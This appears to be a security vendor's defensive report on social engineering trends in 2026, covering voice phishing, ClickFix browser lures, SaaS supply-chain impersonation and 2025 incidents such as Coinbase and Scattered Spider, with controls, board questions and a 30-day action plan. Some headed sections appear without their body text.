Experiencing a Cyber Incident? Our DFIR team is on standby 24/7.

Introduction

For years, phishing emails drove most social engineering attacks. That has changed. According to Mandiant’s M-Trends 2026 report, based on over 500,000 hours of incident response work, voice phishing has overtaken email as the primary social engineering vector. Email phishing dropped to just 6% of confirmed initial access methods in 2025. Voice phishing rose to 11%, and in cloud-related compromises it reached 23%.

The shift matters. It means the attackers who succeed most often are not sending bulk emails. They are calling help desks, impersonating employees, and talking their way past identity checks in real time. Many of these intrusions leave no malware trace at all. They succeed because someone believed a request was legitimate.

Social engineering remains the attacker’s preferred starting point. Unit 42’s 2025 incident response data found that 36% of all cases began with a social engineering tactic. What makes it dangerous is not the technology behind it, but how easily it fits into everyday work. A password reset, a supplier payment update, a browser security prompt. Each looks routine. Each can be the start of a compromise.

This report covers how social engineering has changed in the past year, what the latest incident data reveals, and what leaders can do to reduce its impact. It includes real-world cases, process-level controls, detection metrics, and a 30-day action plan.

Behind almost every major breach, there is a human story. One decision, one call, or one moment of misplaced trust that changed everything.

How Social Engineering Works in 2026

Social engineering works because it does not look like an attack. It feels normal. A call from IT support, a supplier email, a browser prompt asking you to install a security update. Each seems routine. Each can be the start of a compromise.

Attackers use one clear advantage: human trust. They study how people work, the tools they use, and the habits they follow every day. Then they build stories that fit those patterns. The goal is to make a small request that seems harmless. Reset a password. Approve a login. Confirm a payment.

Once that trust is gained, everything else follows. Access is granted, credentials are harvested, and security alerts are often ignored because the activity looks legitimate. In many cases, no malware is deployed. The attackers use the same tools as the employees they impersonate: email, Teams, VPN portals, and identity platforms.

Three forms dominate in 2026:

High-touch manipulation. Attackers interact directly with staff, primarily by phone. They call IT help desks and finance teams, using real-time voice to reset MFA tokens, unlock accounts, or change payment details. Mandiant’s M-Trends 2026 report documents groups like Scattered Spider (UNC3944) escalating from a single help desk call to full domain admin access in under 40 minutes, using no malware at all.

Browser and search-based deception. Automated lures reach users through fake browser prompts, search engine poisoning, and fraudulent system messages. A growing category known as ClickFix attacks deserves particular attention. These campaigns present users with a fake error message or CAPTCHA page and instruct them to “fix” the problem by copying and running a command, often a PowerShell script. The user initiates the action themselves, which means endpoint controls and web filters may not catch it. The browser is replacing the inbox as the most exploited entry point.

Supply chain impersonation. Some groups now chain multiple tactics together. The ShinyHunters operation, documented extensively in Mandiant’s 2026 report, used voice phishing to compromise credentials at third-party SaaS vendors, then harvested OAuth tokens and session cookies to pivot into downstream customer environments. What began as a phone call to one organisation ended in data theft across many.

Each of these methods takes advantage of process, not code. They exploit how organisations manage identity, approve access, and respond to urgency. The weakness is not the system. It is the workflow itself.

Why Social Engineering Keeps Winning

Technical defences have never been stronger. Firewalls, endpoint protection, and advanced monitoring are now standard. Yet social engineering keeps breaking through. The reason is simple: technology can’t patch human behaviour.

Attackers don’t need to find software flaws when they can exploit trust, pressure, or routine. They focus on how people respond, not how systems work. That makes these attacks faster, cheaper, and often invisible to security tools.

A split scene cyber visual showing the clash betw…

Several factors explain why this tactic still dominates in 2026:

1. Alert fatigue and missed signals. Security teams face a flood of alerts every day. When thousands of notifications compete for attention, small anomalies get lost. Attackers know this. They mimic legitimate logins and user behaviour so their actions blend in. What looks like a normal access request can be a full compromise in progress. The window for response is shrinking fast. Mandiant’s M-Trends 2026 report found that the median time between initial access and hand-off to a second threat actor collapsed from over eight hours in 2022 to 22 seconds in 2025. By the time a SOC analyst reads the alert, the access may already have been passed to a ransomware operator.

2. Over-permitted accounts: Many employees have more access than they need. When one of those accounts is compromised, the attacker inherits all its privileges. That single mistake can give them control over email systems, shared drives, or cloud dashboards.

3. Inconsistent identity verification: Help desks and approval processes are often built for speed, not scrutiny. If a request sounds urgent or convincing, it is easy to bypass normal checks. Attackers exploit this by pretending to be executives, suppliers, or even auditors.

4. The pressure to respond quickly: Modern business moves fast. Messages marked as “urgent” get priority. Criminals use this to push employees into decisions before they have time to verify. A payment request, a password reset, or a new meeting link, all can look routine under pressure.

5. AI-enhanced deception, but not in the way most people think. Artificial intelligence is now part of the attacker’s toolkit for social engineering. Criminals use AI tools to personalise phishing lures, clone voices, and build more convincing pretexts. Purpose-built criminal platforms, not consumer tools like ChatGPT, are being commercialised for this. Phishing-as-a-service kits with AI-generated templates now cost as little as $200 per month on criminal forums.

However, the picture is more nuanced than the headlines suggest. Mandiant’s assessment in M-Trends 2026 is clear: 2025 was not the year where breaches were the direct result of AI. The vast majority of successful intrusions still stem from human and systemic failures, things like weak identity verification, over-permitted accounts, and inconsistent MFA. AI makes social engineering faster and more convincing, but the underlying weaknesses it exploits are the same ones that existed before AI entered the picture.

This matters for how you invest. The answer is not to panic about AI-generated deepfakes. The answer is to fix the process gaps that attackers, with or without AI, continue to walk through.

The New Tactics and Trends of 2026

Social engineering is evolving. The channels are changing, the speed is increasing, and the line between criminal and state-sponsored activity is harder to draw. Below are the five clearest shifts we see heading into 2026, drawn from incident data rather than speculation.

1. Voice phishing overtakes email

For the first time, voice phishing has displaced email as the dominant social engineering method in confirmed incidents. Mandiant’s M-Trends 2026 report records email phishing at just 6% of initial access vectors, down from a much larger share in previous years. Voice phishing rose to 11% overall, and 23% in cloud-related compromises.

Separately, CrowdStrike recorded a 442% increase in vishing attacks in the second half of 2024 compared to the first half.

This is not a small shift. It means that organisations whose detection, training, and verification processes are built around email are increasingly misaligned with how attacks actually arrive. Phone calls bypass spam filters, email authentication, and most endpoint controls. They exploit trust in the moment, not through a link someone can inspect later.

What to watch: Unexpected calls requesting MFA resets, password changes, or device registrations. Callers who know your internal process language. Any helpdesk interaction that results in a privilege change.

2. ClickFix and browser-based attacks

A growing category of social engineering now targets users through their browser rather than their inbox. ClickFix campaigns present victims with a fake error message, CAPTCHA page, or “security update required” prompt. The page instructs the user to copy a command and paste it into a system dialog, typically PowerShell on Windows.

The user initiates the action themselves. Because there is no malicious attachment or link to scan, many web and endpoint controls do not flag it early. The user becomes the execution engine for the attacker’s payload.

Security researchers at Red Canary and elsewhere have identified the browser as overtaking email as phishing’s most exploited entry point in 2026. These campaigns use search engine poisoning, look-alike download pages, and social media distribution to reach targets.

What to watch: “Click to fix” browser popups, search results leading to unfamiliar download pages, and any prompt asking a user to run a command or script they did not initiate.

3. AI as a force multiplier, not a root cause

AI is now embedded in attacker workflows for social engineering. Criminals use large language models to write personalised lures, generate convincing pretexts, and shift from mass campaigns toward rapport-building conversations tailored to individual targets.

Purpose-built criminal AI tools are more concerning than misuse of consumer AI products. Platforms like SheByte, a phishing-as-a-service kit available on the criminal underground, automate the creation of phishing sites using AI-generated templates. Deepfake voice and video tools are increasingly woven across entire attack chains rather than used as standalone tricks.

That said, Mandiant’s frontline assessment in M-Trends 2026 provides an important corrective to the hype: AI is not yet the root cause of most breaches. The majority of successful intrusions in 2025 still stemmed from fundamental human and systemic failures. Weak identity verification, excessive permissions, and poor logging remain the primary reasons social engineering works.

AI raises the ceiling of what attackers can do. But the floor, the basic process gaps that most attacks exploit, has not changed.

What to watch: Highly personalised voice calls or messages that reference real internal details. Lures that adapt tone and context mid-conversation. Synthetic media used to impersonate executives or trusted contacts.

4. Industrialised access brokering

Social engineering incidents are no longer standalone events. In a growing number of cases, the group that gains initial access is not the same group that carries out the follow-on attack.

Mandiant’s M-Trends 2026 report documents a clear division-of-labour model: one cluster gains access through social engineering, then hands it to a separate cluster for data theft, ransomware, or fraud. This pattern appeared in 9% of 2025 investigations, up from 4% in 2022. The median hand-off time between initial access and transfer to a second group has collapsed from over eight hours to 22 seconds.

Groups like ShinyHunters exemplify this model. Using vishing campaigns, they compromise credentials at SaaS vendors, harvest OAuth tokens and session cookies, then use those secrets to pivot into downstream customer environments for large-scale data theft. Victims later receive extortion notes.

The practical implication is important: a social engineering incident at a single employee’s account is no longer contained to that account. It can be the entry point for a chain of compromises across connected systems and organisations.

What to watch: Any social engineering attempt, even one that appears to fail, should be treated as a potential precursor to a broader operation. Monitor for credential reuse, unusual OAuth consent grants, and lateral movement into connected platforms.

5. Recovery denial as the new endgame

Ransomware groups have moved beyond encrypting files and demanding payment. In 2025, Mandiant documented a systematic shift toward what analysts now call recovery denial: attackers deliberately destroy the infrastructure organisations need to recover before deploying ransomware.

This includes targeting backup systems, identity services, virtualisation management planes, and credential vaults. In documented cases, attackers wiped millions of backup objects from cloud storage, encrypted datastore files at the hypervisor level, and forced password changes on privileged accounts to lock defenders out of emergency access.

The connection to social engineering is direct. The initial foothold that enables these operations is often a vishing call to a help desk, a compromised set of credentials obtained through impersonation, or an OAuth token harvested after a social engineering campaign against a SaaS vendor.

When social engineering leads to credential compromise, and that compromise leads to the destruction of recovery capability, the business impact is no longer a data breach. It is an operational crisis.

What to watch: Any social engineering attempt targeting accounts with access to backup systems, identity infrastructure, or virtualisation management. Unusual activity on break-glass accounts or credential vaults.

What This Looks Like in Practice

The trends above are not theoretical. Below are three incidents from 2025 that illustrate how social engineering drives real compromise, and how the business impact extends far beyond the initial phone call or message.

Coinbase: bribed insiders, targeted social engineering

In May 2025, Coinbase confirmed that cybercriminals had bribed overseas support staff to leak sensitive customer data, including names, dates of birth, email addresses, and partial Social Security numbers. The attackers then used this data to run highly targeted social engineering campaigns against Coinbase customers.

When the attackers demanded a $20 million ransom, Coinbase refused and instead offered a bounty for information leading to their arrest. The estimated cost of customer reimbursements ran into hundreds of millions of dollars.

The lesson is uncomfortable but clear: the insider threat and the social engineering threat are not separate problems. One enables the other.

ShinyHunters: vishing into the SaaS supply chain

Throughout 2025, a cluster tracked by Mandiant used voice phishing to compromise credentials at third-party SaaS vendors. Once inside, the attackers harvested OAuth tokens, session cookies, and hard-coded access keys. They then used these secrets to pivot into downstream customer environments, including major enterprises.

No malware was deployed. No software vulnerability was exploited. The entire operation ran on phone calls, trust, and the persistent access that SaaS tokens provide. Victims received extortion notes branded under the ShinyHunters name.

This case illustrates why third-party risk assessments must account for social engineering, not just technical controls. The weakest link was not a firewall or an unpatched server. It was a person who answered the phone.

UK retailers: Scattered Spider and DragonForce

In 2025, the group known as Scattered Spider (tracked by Mandiant as UNC3944) compromised multiple well-known UK retailers. Initial access was gained through social engineering of help desk staff, a pattern this group has used consistently since its attacks on Las Vegas casinos in 2023.

Once inside, the group deployed DragonForce ransomware. The attacks caused significant operational disruption and attracted national media coverage.

The pattern is now well documented: social engineering of the help desk, followed by MFA bypass, lateral movement, and ransomware deployment. These are not sophisticated technical exploits. They are process failures that repeat because the underlying verification gaps have not been closed.

How Attackers Exploit Human Processes

Social engineering works best when it looks like business as usual. Attackers copy how your teams already work, then slip into the gaps. Here are the most common weak points, and why they fail.

How Attackers Exploit Human Processes visual selection

1) Identity recovery and MFA resets

2) Payment changes and fast approvals

3) Inbox trust and executive impersonation

4) Browser prompts, ClickFix, and search “fixes”

5) Supplier and recruiter impersonation

6) “Exception” culture

What this means for leaders

Business Impact and Regulation

Why it hurts

What EU and UK regulators expect

NIS2: Clear governance over risk, identity, and incident handling. That includes access control, phishing-resistant MFA, monitoring, and rapid reporting. Social engineering that leads to a network or information system compromise falls squarely within scope.

DORA: Treat ICT and third-party providers as critical. Test controls, keep evidence, classify incidents, and report within set timelines. The SaaS supply chain compromises documented in 2025, where vishing at a vendor led to data theft across customer environments, are exactly the kind of scenario DORA is designed to address.

GDPR and sector rules: If social engineering leads to personal data exposure, you may face breach notification obligations and fines. Evidence of due diligence matters. Organisations that can demonstrate scripted verification processes, dual approval controls, and auditable identity recovery workflows are in a stronger position than those that cannot.

UK Government Counter Fraud Strategy: The UK Government’s Counter Fraud Functional Strategy 2025-2026 progress review, published in March 2026, reported £7.5 billion saved through fraud prevention and enforcement. The direction of travel is clear: regulators expect proactive, evidenced controls, not reactive responses.

Controls That Work

Keep it simple and procedural. Make fraud harder, slower, and visible.

Verify the person

Control the action

Harden identity recovery

Reduce easy paths

Train for the real thing

Defend beyond the inbox

Most social engineering controls were designed for email-based attacks. That is no longer sufficient. Detection and verification processes must now extend to voice calls, messaging platforms, browser-based vectors, and collaboration tools like Teams and Slack.

For voice calls, this means enforcing callback verification using directory numbers, not numbers provided by the caller. For browser-based threats, it means restricting users’ ability to execute system commands from prompts and maintaining allow-lists for software installations. For collaboration platforms, it means treating messages from external contacts with the same scrutiny as external email.

The principle is simple: if an attacker can reach your staff through a channel, your verification controls must cover that channel.

What to implement this quarter

5 Questions for the Board

Social engineering is not a technical problem that can be delegated to the security team alone. It is a business risk that depends on how your organisation verifies identity, approves changes, and responds to urgency. These are questions that leadership should be able to answer.

1. Can your helpdesk verify identity without relying on information an attacker could find online? If your verification process depends on name, date of birth, employee number, or email address, it is vulnerable. Attackers routinely gather this information from LinkedIn, corporate websites, and data breaches. A process that feels thorough but relies on publicly available facts is not verification. It is theatre.

2. When did you last test your team’s response to a voice call, not just a phishing email? Most phishing simulations test email. The data now shows that voice phishing is more likely to succeed, harder to detect, and growing faster. If you have never tested whether your help desk, finance team, or executive assistants can spot a convincing vishing attempt, you do not know your actual exposure.

3. Do you have dual approval and time-boxed holds for payment changes and bank detail updates? A single approver under time pressure is the most common point of failure in payment fraud. Dual approval with a mandatory hold period, even 24 hours, is one of the simplest and most effective controls available. If your process allows one person to change supplier bank details and release a payment on the same day, that gap is likely to be exploited.

4. How quickly would you detect a compromised identity being used across cloud platforms? Attackers who gain credentials through social engineering often move laterally into SaaS platforms, email, and collaboration tools within minutes. If your monitoring does not cover OAuth consent grants, session anomalies, and cross-platform access patterns, compromised accounts can operate undetected for days or weeks.

5. Do your incident response plans account for multi-channel social engineering? If your IR playbook assumes a phishing email as the starting point, it may not cover scenarios that begin with a phone call, a Teams message, or a browser-based lure. The attack surface for social engineering has widened. Response plans should reflect that.

If your leadership team cannot answer these questions with confidence, it is worth reviewing whether your current controls match your actual risk.

Detection and Metrics

Detection should focus on behaviour. You are looking for signs that a person or a process is being misused, especially after identity changes or helpdesk activity.

What to surface

Keep evidence. Log who approved what, when, and why. Store MFA changes, device joins, consent grants, role assignments and the start and end of any privileged session. In finance, record the callback, the verifier and the hold release time. For helpdesk activity, capture artefacts reviewed and challenge questions used. This gives incident responders and auditors a clear trail.

Metrics to manage

Review these weekly. If any indicator drifts, adjust scripts, training and ownership before it becomes a pattern.

30-Day Action Plan

This is a short, practical plan to raise your defences quickly. Keep the scope tight. Prove the controls work. Capture evidence as you go.

Week 1: Set the rules

Week 2: Tighten identity and access

Week 3: Make detection useful

Week 4: Test and fix

Finish line

Write a short memo to the leadership team with three items: the verification policy link, this month’s KPI snapshot, and the top three fixes you made. This builds trust and keeps the work funded.

Wrapping Up

Social engineering thrives because it looks like normal work. A call to the helpdesk. A supplier message. A browser prompt that seems routine.

What has changed is where these attacks arrive. Voice calls, messaging platforms, and browser-based lures now carry as much risk as email, and in some cases more. The controls that matter, verification, dual approval, time-boxed holds, and auditable evidence, are the same regardless of channel. But they must be applied consistently across every path an attacker can use to reach your staff.

The defence is not complicated. Verify the person using a number you already trust. Slow any high-risk change with a second approver and a short hold. Keep evidence of every reset, approval, and exception. When these habits are in place, most attempts fail quietly. The ones that slip through leave a clear trail you can act on.

Leaders set the tone. Publish one page of simple rules. Sample a small percentage of resets and payments every week. Track a handful of KPIs so everyone sees whether controls are working. When exceptions are needed, record them and close them quickly. This is the work that reduces loss, shortens investigations, and strengthens your position with regulators.

If you want to test whether your current controls match your actual risk, speak with our team. We can help you align policy and practice across identity recovery, approvals, and monitoring, with attention to measurable outcomes and regulatory expectations.

Curated with purpose, delivered with precision – The ThreatScene Team

Untitled design

References